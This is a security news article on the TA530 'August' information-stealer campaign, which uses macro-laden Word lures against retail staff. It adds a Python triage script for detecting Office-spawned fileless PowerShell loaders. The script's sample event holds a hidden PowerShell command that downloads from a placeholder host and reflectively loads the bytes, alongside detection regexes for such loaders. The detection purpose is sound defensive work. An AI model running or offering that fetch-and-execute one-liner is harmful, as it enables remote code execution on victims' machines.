Cybercriminals are using personalized malware campaigns against staff at retailers in order to steal credentials and sensitive documents.
A group known as TA530 is distributing the information-stealing malicious software through socially engineered emails which encourage victims to download an attachment containing the relatively new ‘August’ malware (lines in the malware’s code as well as the control panel for stolen credentials all refer to the month).
Cybersecurity researchers at Proofpoint have been monitoring the August campaign and say the lures used in the subject lines of emails make reference to purchases the hackers claim to have made on the targeted company’s website, asking the targeted victim to provide support for a false purchase.
Subject lines are personalized using the target’s company name, with false queries relating to topics including erroneous or duplicate charges, items vanishing from the online cart and help with orders, while the text of the email points the victim towards a document supposedly containing more information.
The Word document requires the user to enable macros; once enabled, the macro applies sandbox evasion techniques similar to those used by the Ursnif banking Trojan and then delivers the payload that infects the machine.
Once installed, August will steal and upload files, take money from cryptocurrency wallets, grab user login credentials by monitoring applications and web browsers, and more, with files and information uploaded to a command and control server.
All of this occurs while August remains undetected by the infected users thanks to evasion techniques and a fileless approach: the malware is loaded via PowerShell from a byte array hosted on a remote site rather than written to disk. Together, these factors make August difficult to detect at any point during the operation.
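The macro-to-PowerShell, fileless loading chain described above leaves a telltale process-creation pattern even when nothing is written to disk: an Office application spawning PowerShell with a command line that fetches data from a remote host, keeps it as an in-memory byte array and loads it. The following triage script is an added example, not part of the Proofpoint research or of the August malware itself; the event field names (Sysmon-style `ParentImage`, `Image`, `CommandLine`) and the sample events are constructed assumptions.

```python
import re

# Constructed process-creation events in a Sysmon-like shape; not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"$b=(New-Object Net.WebClient)"
                    ".DownloadData('http://example.invalid/x');"
                    "[Reflection.Assembly]::Load([byte[]]$b)\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c echo hello"},
]

OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
SCRIPT_HOSTS = ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")

# Hallmarks of a fileless, network-sourced loader: remote fetch, in-memory
# byte array, reflective load or inline evaluation, and a hidden window.
LOADER_PATTERNS = [
    re.compile(r"downloadstring|downloaddata", re.I),
    re.compile(r"\[byte\[\]\]", re.I),
    re.compile(r"\[reflection\.assembly\]::load|\biex\b|invoke-expression", re.I),
    re.compile(r"-w(indowstyle)?\s+hidden", re.I),
]

def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def score_event(evt):
    """Rate one event: high = Office -> PowerShell with loader hallmarks,
    medium = Office spawning any script host, low = hallmarks elsewhere."""
    parent, child = basename(evt["ParentImage"]), basename(evt["Image"])
    hits = [p.pattern for p in LOADER_PATTERNS if p.search(evt["CommandLine"])]
    if parent in OFFICE_PARENTS and child == "powershell.exe" and hits:
        severity = "high"
    elif parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        severity = "medium"
    else:
        severity = "low" if hits else "none"
    return {"parent": parent, "child": child, "severity": severity, "hits": hits}

def triage(events):
    return [score_event(e) for e in events]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["severity"], f["parent"], "->", f["child"], len(f["hits"]), "hallmarks")
```

Pairing this process-lineage check with PowerShell script block logging gives a second look at the decoded command even when the visible command line is obfuscated.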
Those behind the scheme are mostly targeting retailers and manufacturers with large business-to-consumer sales operations, although researchers warn that August could be used to steal credentials and files “in a wide range of scenarios”. The TA530 group has previously carried out phishing campaigns against company executives using similar methods.
As email lures and phishing campaigns become more effective, one simple form of protection against August – and other malware which requires macros to operate – is not to enable macros. Proofpoint researchers also recommend user education to address emails which may not initially look suspicious.